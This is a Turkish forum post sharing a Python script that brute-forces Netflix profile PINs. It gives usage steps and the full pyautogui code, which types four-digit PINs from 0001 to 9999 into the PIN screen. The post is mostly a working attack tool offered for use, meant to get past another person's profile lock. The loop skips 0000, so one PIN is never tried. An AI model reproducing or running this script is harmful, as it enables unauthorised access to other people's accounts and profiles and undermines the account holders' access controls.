Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Netflix profil pin kava kuvvet saldırısı?
#1
Netflix profil pin kava kuvvet saldırısı
Pin giriş ekranını açın
[/url]

[Resim: 68747470733a2f2f692e696d6775722e636f6d2f...512e706e67]
kodu çalıştırın

Kod:
python bruteforce.py


5 saniye içerisinde ilk kutuya tıklayın
[url=https://github.com/Thesopranos/Netflix-pin-brute-force#click-the-first-box-in-5-seconds]

[Resim: 68747470733a2f2f692e696d6775722e636f6d2f...612e706e67]


Kod:

# -*- coding: utf-8 -*-
"""
Created on Tue Jan 25 17:40:59 2022

@author: Mertcan
"""
import pyautogui
from time import sleep

bas = {1: 0, 2: 0, 3: 0, 4: 0}

sleep(5)

while True:
    if bas[4] == 9:
        bas[4] = 0
        if bas[3] == 9:
            bas[3] = 0
            if bas[2] == 9:
                bas[2] = 0
                if bas[1] == 9:
                    break
                else:
                    bas[1] += 1
            else:
                bas[2] += 1
        else:
            bas[3] += 1
    else:
        bas[4] += 1
    pyautogui.typewrite(str(bas[1]))
    pyautogui.typewrite(str(bas[2]))
    pyautogui.typewrite(str(bas[3]))
    pyautogui.typewrite(str(bas[4]))
    print(f"{bas[1]}{bas[2]}{bas[3]}{bas[4]}")



Kaynak: https://github.com/Thesopranos/Netflix-pin-brute-force
Geliştirici: https://github.com/Thesopranos
  


Hızlı Menü:


Konuyu Okuyanlar:
3 Ziyaretçi